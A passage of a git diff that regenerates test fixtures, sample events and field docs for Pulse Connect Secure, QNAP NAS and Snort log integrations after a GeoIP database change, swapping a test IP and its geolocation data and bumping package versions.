"tags": [ @@ -669,26 +720,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677724498Z", - "original": "Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Closed connection to TUN-VPN port 443 after 9 seconds, with 1308 bytes read (in 1 chunks) and 1131 bytes written (in 1 chunks) (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", + "ingested": "2021-12-14T14:54:27.270282025Z", + "original": "Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Closed connection to TUN-VPN port 443 after 9 seconds, with 1308 bytes read (in 1 chunks) and 1131 bytes written (in 1 chunks) (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:49:40.000+02:00", @@ -711,22 +765,25 @@ "ip": "172.22.27.209" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "VPN Tunneling: Session ended for user (session: sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) with IPv4 address 172.22.27.209", "tags": [ @@ -754,26 +811,29 @@ "ip": "172.22.27.209" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677727411Z", - "original": "Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session ended for user (session: sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) with IPv4 address 172.22.27.209", + "ingested": "2021-12-14T14:54:27.270282405Z", + "original": "Oct 19 09:49:40 pcs-node1 1 2021-10-19T09:49:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:40 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session ended for user (session: sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4) with IPv4 address 172.22.27.209", "timezone": "+02:00", "created": "2021-10-19T09:49:40.000+02:00", "kind": "event", @@ -798,24 +858,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, - "message": "Logout from 55.53.160.32 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", + "message": "Logout from 89.160.20.156 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", "tags": [ "preserve_original_event" ], @@ -835,26 +898,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677730334Z", - "original": "Oct 19 09:49:41 pcs-node1 1 2021-10-19T09:49:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:41 - pcs-node1 - [55.53.160.32] user.name()[] - Logout from 55.53.160.32 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", + "ingested": "2021-12-14T14:54:27.270282796Z", + "original": "Oct 19 09:49:41 pcs-node1 1 2021-10-19T09:49:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:49:41 - pcs-node1 - [89.160.20.156] user.name()[] - Logout from 89.160.20.156 (session:sid085594569c49f5da11e483b49eaaabfc6fede5ce4a227da4)", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:49:41.000+02:00", @@ -874,22 +940,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "Session resumed from user agent 'Pulse-Secure/9.1.11.6725 (Windows 10) Pulse/9.1.11.6725' (session:sid9734dc3a195205ddb89cc05a9261a271201b4687ab468240).", "tags": [ @@ -911,26 +980,29 @@ }, "client": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 328, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.53.160.32", - "ip": "55.53.160.32" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T13:53:10.677733390Z", - "original": "Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Session resumed from user agent 'Pulse-Secure/9.1.11.6725 (Windows 10) Pulse/9.1.11.6725' (session:sid9734dc3a195205ddb89cc05a9261a271201b4687ab468240).", + "ingested": "2021-12-14T14:54:27.270283373Z", + "original": "Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Session resumed from user agent 'Pulse-Secure/9.1.11.6725 (Windows 10) Pulse/9.1.11.6725' (session:sid9734dc3a195205ddb89cc05a9261a271201b4687ab468240).", "category": "network", "timezone": "+02:00", "created": "2021-10-19T09:11:19.000+02:00", diff --git a/packages/pulse_connect_secure/data_stream/log/fields/ecs.yml b/packages/pulse_connect_secure/data_stream/log/fields/ecs.yml index 0f42cec2ae9..96325469a85 100644 --- a/packages/pulse_connect_secure/data_stream/log/fields/ecs.yml +++ b/packages/pulse_connect_secure/data_stream/log/fields/ecs.yml @@ -10,6 +10,12 @@ name: client.as.number - external: ecs name: client.as.organization.name +- external: ecs + name: client.geo.region_iso_code +- external: ecs + name: client.geo.region_name +- external: ecs + name: client.geo.city_name - external: ecs name: client.geo.continent_name - external: ecs @@ -20,6 +26,26 @@ level: core name: client.geo.location type: geo_point +- external: ecs + name: source.as.number +- external: ecs + name: source.as.organization.name +- external: ecs + name: source.geo.continent_name +- external: ecs + name: source.geo.country_iso_code +- external: ecs + name: source.geo.region_iso_code +- external: ecs + name: source.geo.region_name +- external: ecs + name: source.geo.city_name +- external: ecs + name: source.geo.country_name +- description: Longitude and latitude. + level: core + name: source.geo.location + type: geo_point - external: ecs name: client.ip - external: ecs diff --git a/packages/pulse_connect_secure/data_stream/log/sample_event.json b/packages/pulse_connect_secure/data_stream/log/sample_event.json index 88c7468ad3a..32f6bd915ce 100644 --- a/packages/pulse_connect_secure/data_stream/log/sample_event.json +++ b/packages/pulse_connect_secure/data_stream/log/sample_event.json @@ -9,7 +9,7 @@ "version": "7.16.0" }, "client": { - "address": "55.53.160.32", + "address": "89.160.20.156", "as": { "number": 328, "organization": { @@ -25,7 +25,7 @@ "lon": -97.822 } }, - "ip": "55.53.160.32" + "ip": "89.160.20.156" }, "data_stream": { "dataset": "pulse_connect_secure.log", @@ -47,7 +47,7 @@ "dataset": "pulse_connect_secure.log", "ingested": "2021-12-08T13:55:56Z", "kind": "event", - "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "outcome": "success", "timezone": "+02:00" }, @@ -62,7 +62,7 @@ "address": "172.31.0.7:53480" } }, - "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "observer": { "ip": "10.5.2.3", "name": "pcs-node1", @@ -78,7 +78,7 @@ } }, "source": { - "address": "55.53.160.32", + "address": "89.160.20.156", "as": { "number": 328, "organization": { @@ -94,7 +94,7 @@ "lon": -97.822 } }, - "ip": "55.53.160.32" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event", diff --git a/packages/pulse_connect_secure/docs/README.md b/packages/pulse_connect_secure/docs/README.md index 2634a38bfd0..ff2a8580605 100644 --- a/packages/pulse_connect_secure/docs/README.md +++ b/packages/pulse_connect_secure/docs/README.md @@ -18,7 +18,7 @@ An example event for `log` looks as following: "version": "7.16.0" }, "client": { - "address": "55.53.160.32", + "address": "89.160.20.156", "as": { "number": 328, "organization": { @@ -34,7 +34,7 @@ An example event for `log` looks as following: "lon": -97.822 } }, - "ip": "55.53.160.32" + "ip": "89.160.20.156" }, "data_stream": { "dataset": "pulse_connect_secure.log", @@ -56,7 +56,7 @@ An example event for `log` looks as following: "dataset": "pulse_connect_secure.log", "ingested": "2021-12-08T13:55:56Z", "kind": "event", - "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "outcome": "success", "timezone": "+02:00" }, @@ -71,7 +71,7 @@ An example event for `log` looks as following: "address": "172.31.0.7:53480" } }, - "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", + "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "observer": { "ip": "10.5.2.3", "name": "pcs-node1", @@ -87,7 +87,7 @@ An example event for `log` looks as following: } }, "source": { - "address": "55.53.160.32", + "address": "89.160.20.156", "as": { "number": 328, "organization": { @@ -103,7 +103,7 @@ An example event for `log` looks as following: "lon": -97.822 } }, - "ip": "55.53.160.32" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event", @@ -136,10 +136,13 @@ An example event for `log` looks as following: | client.address | Some event client addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | client.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | client.as.organization.name | Organization name. | keyword | +| client.geo.city_name | City name. | keyword | | client.geo.continent_name | Name of the continent. | keyword | | client.geo.country_iso_code | Country ISO code. | keyword | | client.geo.country_name | Country name. | keyword | | client.geo.location | Longitude and latitude. | geo_point | +| client.geo.region_iso_code | Region ISO code. | keyword | +| client.geo.region_name | Region name. | keyword | | client.ip | IP address of the client (IPv4 or IPv6). | ip | | client.nat.ip | Translated IP of source based NAT sessions (e.g. internal client to internet). Typically connections traversing load balancers, firewalls, or routers. | ip | | cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | @@ -195,10 +198,13 @@ An example event for `log` looks as following: | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | source.as.organization.name | Organization name. | keyword | +| source.geo.city_name | City name. | keyword | | source.geo.continent_name | Name of the continent. | keyword | | source.geo.country_iso_code | Country ISO code. | keyword | | source.geo.country_name | Country name. | keyword | | source.geo.location | Longitude and latitude. | geo_point | +| source.geo.region_iso_code | Region ISO code. | keyword | +| source.geo.region_name | Region name. | keyword | | source.ip | IP address of the source (IPv4 or IPv6). | ip | | source.nat.ip | Translated ip of source based NAT sessions (e.g. internal client to internet) Typically connections traversing load balancers, firewalls, or routers. | ip | | tags | List of keywords used to tag each event. | keyword | diff --git a/packages/pulse_connect_secure/manifest.yml b/packages/pulse_connect_secure/manifest.yml index ca7df03d7e4..8ec5e067983 100644 --- a/packages/pulse_connect_secure/manifest.yml +++ b/packages/pulse_connect_secure/manifest.yml @@ -1,6 +1,6 @@ name: pulse_connect_secure title: Pulse Connect Secure -version: 0.0.1 +version: 0.0.2 release: experimental description: Collect logs from Pulse Connect Secure with Elastic Agent. type: integration diff --git a/packages/qnap_nas/changelog.yml b/packages/qnap_nas/changelog.yml index 2a06c2635bc..f985a886963 100644 --- a/packages/qnap_nas/changelog.yml +++ b/packages/qnap_nas/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.0" changes: - description: initial release diff --git a/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-access.log-expected.json b/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-access.log-expected.json index a2334217552..cbcab608721 100644 --- a/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-access.log-expected.json +++ b/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-access.log-expected.json @@ -53,7 +53,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371354597Z", + "ingested": "2021-12-14T14:54:30.319623016Z", "original": "\u003c30\u003eOct 30 20:24:24 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: path/to/files/New folder, Action: Create Directory", "provider": "conn-log", "timezone": "-05:00", @@ -118,7 +118,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371379473Z", + "ingested": "2021-12-14T14:54:30.319633366Z", "original": "\u003c30\u003eOct 30 20:24:25 qnap-nas01 qulogd[14629]: conn log: Users: guest, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: ---, Action: Login Fail", "provider": "conn-log", "timezone": "-05:00", @@ -184,7 +184,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371385906Z", + "ingested": "2021-12-14T14:54:30.319634156Z", "original": "\u003c30\u003eOct 30 20:35:25 qnap-nas01 qulogd[14629]: conn log: Users: guest, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: ---, Action: Login Success", "provider": "conn-log", "timezone": "-05:00", @@ -247,7 +247,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371391494Z", + "ingested": "2021-12-14T14:54:30.319634760Z", "original": "\u003c30\u003eNov 21 14:42:18 qnap-nas01 qulogd[14387]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Connection type: HTTP/HTTPS, Accessed resources: Administration, Action: Login Success", "provider": "conn-log", "timezone": "-05:00", @@ -313,7 +313,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371397004Z", + "ingested": "2021-12-14T14:54:30.319649046Z", "original": "\u003c30\u003eOct 30 20:35:25 qnap-nas01 qulogd[14629]: conn log: Users: guest, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: HTTP/HTTPS, Accessed resources: ---, Action: Logout", "provider": "conn-log", "timezone": "-05:00", @@ -381,7 +381,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371402287Z", + "ingested": "2021-12-14T14:54:30.319650035Z", "original": "\u003c30\u003eOct 30 20:24:30 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Connection type: HTTP/HTTPS, Accessed resources: [File Station] /Browser Station/admin, Action: Read", "provider": "conn-log", "timezone": "-05:00", @@ -447,7 +447,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371407486Z", + "ingested": "2021-12-14T14:54:30.319650763Z", "original": "\u003c30\u003eOct 30 20:24:30 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: path/to/files/New folder -\u003e path/to/files/asdf, Action: Rename", "provider": "conn-log", "timezone": "-05:00", @@ -518,7 +518,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371417637Z", + "ingested": "2021-12-14T14:54:30.319651371Z", "original": "\u003c30\u003eOct 30 20:24:33 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: path/to/files/asdf, Action: Delete", "provider": "conn-log", "timezone": "-05:00", @@ -590,7 +590,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371423088Z", + "ingested": "2021-12-14T14:54:30.319651997Z", "original": "\u003c30\u003eOct 30 20:43:19 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: path/to/files/picture.jpg, Action: Read", "provider": "conn-log", "timezone": "-05:00", @@ -662,7 +662,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:47.371428153Z", + "ingested": "2021-12-14T14:54:30.319652532Z", "original": "\u003c30\u003eOct 30 20:43:19 qnap-nas01 qulogd[14629]: conn log: Users: admin.user, Source IP: 10.50.36.33, Computer name: user-laptop, Connection type: Samba, Accessed resources: path/to/files/picture.jpg, Action: Add", "provider": "conn-log", "timezone": "-05:00", diff --git a/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-event.log-expected.json b/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-event.log-expected.json index 0628f65ddd0..a6ebd2db5b0 100644 --- a/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-event.log-expected.json +++ b/packages/qnap_nas/data_stream/log/_dev/test/pipeline/test-event.log-expected.json @@ -38,7 +38,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383683415Z", + "ingested": "2021-12-14T14:54:31.222784822Z", "original": "\u003c28\u003eOct 30 20:28:41 qnap-nas01 qulogd[14629]: event log: Users: admin, Source IP: 127.0.0.1, Computer name: ---, Application: Network \u0026 Virtual Switch, Category: Infrastructure, Content: [Network \u0026 Virtual Switch] Interface \"Adapter 2\" disconnected.", "provider": "event-log", "timezone": "-05:00", @@ -91,7 +91,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383697291Z", + "ingested": "2021-12-14T14:54:31.222787899Z", "original": "\u003c30\u003eOct 30 20:29:32 qnap-nas01 qulogd[14629]: event log: Users: admin, Source IP: 127.0.0.1, Computer name: ---, Application: Network \u0026 Virtual Switch, Category: Infrastructure, Content: [Network \u0026 Virtual Switch] Interface \"Adapter 2\" connected.", "provider": "event-log", "timezone": "-05:00", @@ -144,7 +144,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383701935Z", + "ingested": "2021-12-14T14:54:31.222788341Z", "original": "\u003c30\u003eOct 30 20:29:32 qnap-nas01 qulogd[14629]: event log: Users: admin, Source IP: 127.0.0.1, Computer name: ---, Application: External Device, Category: UPS, Content: [External Device] UPS power restored. Canceled autoprotection mode..", "provider": "event-log", "timezone": "-05:00", @@ -204,7 +204,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383706223Z", + "ingested": "2021-12-14T14:54:31.222788788Z", "original": "\u003c30\u003eOct 30 20:32:25 qnap-nas01 qulogd[14629]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Network \u0026 Virtual Switch, Category: Static Route, Content: [Network \u0026 Virtual Switch] Added static route. Interface: , Destination: 5.5.5.0.", "provider": "event-log", "timezone": "-05:00", @@ -264,7 +264,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383710523Z", + "ingested": "2021-12-14T14:54:31.222789145Z", "original": "\u003c30\u003eOct 30 20:34:22 qnap-nas01 qulogd[14629]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Network \u0026 Virtual Switch, Category: Static Route, Content: [Network \u0026 Virtual Switch] Removed static route. Interface: , Destination: 5.5.5.0.", "provider": "event-log", "timezone": "-05:00", @@ -330,7 +330,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383714793Z", + "ingested": "2021-12-14T14:54:31.222789504Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Shared Folders, Category: General, Content: [Shared Folders] Created shared folder \"abcd\".", "provider": "event-log", "timezone": "-05:00", @@ -399,7 +399,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383719053Z", + "ingested": "2021-12-14T14:54:31.222789845Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Shared Folders, Category: General, Content: [Shared Folders] Deleted shared folder \"abcd\".", "provider": "event-log", "timezone": "-05:00", @@ -462,7 +462,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383723223Z", + "ingested": "2021-12-14T14:54:31.222790189Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: User Groups, Category: General, Content: [User Groups] Deleted user group \"test1\".", "provider": "event-log", "timezone": "-05:00", @@ -529,7 +529,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383727367Z", + "ingested": "2021-12-14T14:54:31.222790658Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: User Groups, Category: General, Content: [User Groups] Created user group \"test1\".", "provider": "event-log", "timezone": "-05:00", @@ -596,7 +596,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383731564Z", + "ingested": "2021-12-14T14:54:31.222791107Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Users, Category: General, Content: [Users] Changed the password of user \"test\".", "provider": "event-log", "timezone": "-05:00", @@ -664,7 +664,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383735816Z", + "ingested": "2021-12-14T14:54:31.222791551Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Users, Category: General, Content: [Users] Edited the account profile of user \"test\".", "provider": "event-log", "timezone": "-05:00", @@ -732,7 +732,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383740296Z", + "ingested": "2021-12-14T14:54:31.222792136Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Users, Category: General, Content: [Users] Created user \"test\".", "provider": "event-log", "timezone": "-05:00", @@ -799,7 +799,7 @@ } }, "event": { - "ingested": "2021-12-08T14:45:51.383744427Z", + "ingested": "2021-12-14T14:54:31.222792504Z", "original": "\u003c30\u003eNov 21 15:23:42 qnap-nas01 qulogd[14387]: event log: Users: admin.user, Source IP: 10.50.36.33, Computer name: ---, Application: Users, Category: General, Content: [Users] Deleted user \"test\".", "provider": "event-log", "timezone": "-05:00", diff --git a/packages/qnap_nas/manifest.yml b/packages/qnap_nas/manifest.yml index d4780b597be..ed16612908e 100644 --- a/packages/qnap_nas/manifest.yml +++ b/packages/qnap_nas/manifest.yml @@ -1,6 +1,6 @@ name: qnap_nas title: QNAP NAS -version: 1.0.0 +version: 1.0.1 release: ga description: Collect logs from QNAP NAS devices with Elastic Agent. type: integration diff --git a/packages/snort/changelog.yml b/packages/snort/changelog.yml index 5ebf92e3a4a..2759ee49740 100644 --- a/packages/snort/changelog.yml +++ b/packages/snort/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.1.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.1.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json index 14b4a192b88..8d82d4fc780 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-csv.log-expected.json @@ -43,7 +43,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094036100Z", + "ingested": "2021-12-14T14:54:33.351280142Z", "original": "09/04-21:45:37.536335 ,1,1000006,0,\"TCP connection\",TCP,10.100.20.59,57263,10.100.10.190,22,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x72,***AP***,0x688F0DFC,0xBC763516,,0x80C,127,0,55665,100,102400,,,,", "category": [ "network" @@ -117,7 +117,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094040500Z", + "ingested": "2021-12-14T14:54:33.351282978Z", "original": "09/04-21:45:37.553882 ,1,1000006,0,\"TCP connection\",TCP,10.100.20.59,57263,10.100.10.190,22,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x72,***AP***,0x688F0E38,0xBC763552,,0x80C,127,0,55666,100,102400,,,,", "category": [ "network" @@ -191,7 +191,7 @@ ] }, "event": { - "ingested": 